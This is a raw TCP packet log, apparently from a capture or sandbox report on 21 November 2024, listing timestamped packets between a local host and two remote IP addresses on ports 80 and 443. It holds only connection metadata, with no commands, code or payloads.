                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:08.059417963 CET4981880192.168.2.5185.215.113.43
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:08.179044008 CET8049818185.215.113.43192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:09.543158054 CET8049818185.215.113.43192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:09.543339968 CET4981880192.168.2.5185.215.113.43
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:10.096220970 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:10.096270084 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:10.096368074 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:10.107237101 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:10.107275963 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:11.495037079 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:11.495116949 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:11.548768997 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:11.548794031 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:11.549115896 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:11.549179077 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:11.551793098 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:11.599330902 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:12.018537998 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:12.018656015 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:12.210822105 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:12.210833073 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:12.210864067 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:12.210966110 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:12.210982084 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:12.211034060 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:12.254534960 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:12.254607916 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:12.254672050 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:12.254687071 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:12.254712105 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:12.254725933 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:12.308944941 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:12.308969021 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:12.309118986 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:12.309151888 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:12.309287071 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:12.428422928 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:12.428487062 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:12.428543091 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:12.428585052 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:12.428597927 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:12.428627014 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:12.453191042 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:12.453236103 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:12.453288078 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:12.453299046 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:12.453326941 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:12.453346968 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:12.523154020 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:12.523178101 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:12.523487091 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:12.523524046 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:12.523578882 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:12.615451097 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:12.615511894 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:12.615577936 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:12.615600109 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:12.615628004 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:12.615647078 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:12.635035992 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:12.635077953 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:12.635113955 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:12.635127068 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:12.635148048 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:12.635160923 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:12.652565002 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:12.652606964 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:12.652645111 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:12.652657032 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:12.652678013 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:12.652693987 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:12.666867018 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:12.666912079 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:12.666954994 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:12.666965961 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:12.666990042 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:12.667009115 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:12.680232048 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:12.680278063 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:12.680363894 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:12.680389881 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:12.680423975 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:12.680435896 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:12.708205938 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:12.708249092 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:12.708403111 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:12.708416939 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:12.708462954 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:12.806988001 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:12.807034969 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:12.807176113 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:12.807203054 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:12.807218075 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:12.807251930 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:12.816015005 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:12.816059113 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:12.816114902 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:12.816124916 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:12.816149950 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:12.816171885 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:12.827482939 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:12.827528000 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:12.827609062 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:12.827621937 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:12.827681065 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:12.837856054 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:12.837915897 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:12.837938070 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:12.837948084 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:12.837965965 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:12.837981939 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:12.848200083 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:12.848244905 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:12.848300934 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:12.848313093 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:12.848334074 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:12.848352909 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:12.858361959 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:12.858429909 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:12.858465910 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:12.858474016 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:12.858489990 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:12.858501911 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:12.866720915 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:12.866770029 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:12.866816998 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:12.866838932 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:12.866852045 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:12.866875887 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:12.900163889 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:12.900213003 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:12.900346041 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:12.900394917 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:12.900455952 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:12.999587059 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:12.999656916 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:12.999784946 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:12.999847889 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:12.999876022 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:12.999896049 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:13.006834984 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:13.006880999 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:13.006970882 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:13.006995916 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:13.007025957 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:13.007045031 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:13.015177011 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:13.015224934 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:13.015261889 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:13.015271902 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:13.015305042 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:13.015333891 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:13.023350000 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:13.023394108 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:13.023449898 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:13.023478985 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:13.023505926 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:13.023519039 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:13.032520056 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:13.032581091 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:13.032664061 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:13.032672882 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:13.032691956 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:13.032713890 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:13.040081978 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:13.040128946 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:13.040178061 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:13.040188074 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:13.040215015 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:13.042927027 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:13.046552896 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:13.046598911 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:13.046636105 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:13.046643972 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:13.046674013 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:13.046693087 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:13.091330051 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:13.091384888 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:13.091487885 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:13.091506004 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:13.091552019 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:13.198367119 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:13.198390007 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:13.198446989 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:13.198460102 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:13.198488951 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:13.198506117 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:13.212400913 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:13.212418079 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:13.212476969 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:13.212486982 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:13.212502956 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:13.212517023 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:13.213478088 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:13.213495970 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:13.213536024 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:13.213546038 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:13.213635921 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:13.221241951 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:13.221266985 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:13.221322060 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:13.221335888 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:13.221359015 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:13.221374989 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:13.229116917 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:13.229139090 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:13.229195118 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:13.229207993 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:13.229239941 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:13.235260963 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:13.235276937 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:13.235327959 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:13.235337019 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:13.235373974 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:13.244249105 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:13.244265079 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:13.244316101 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:13.244324923 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:13.244662046 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:13.292226076 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:13.292251110 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:13.292334080 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:13.292345047 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:13.292378902 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:13.389734983 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:13.389827967 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:13.389986038 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:13.390023947 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:13.390073061 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:13.397052050 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:13.397100925 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:13.397161961 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:13.397170067 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:13.397202969 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:13.397217035 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:13.404628038 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:13.404681921 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:13.404735088 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:13.404742956 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:13.404777050 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:13.404795885 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:13.412499905 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:13.412549019 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:13.412619114 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:13.412630081 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:13.412676096 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:13.419843912 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:13.419893980 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:13.419989109 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:13.420000076 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:13.420044899 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:13.426992893 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:13.427052021 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:13.427126884 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:13.427134991 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:13.427160025 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:13.427174091 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:13.434556007 CET44349824188.165.52.14192.168.2.5
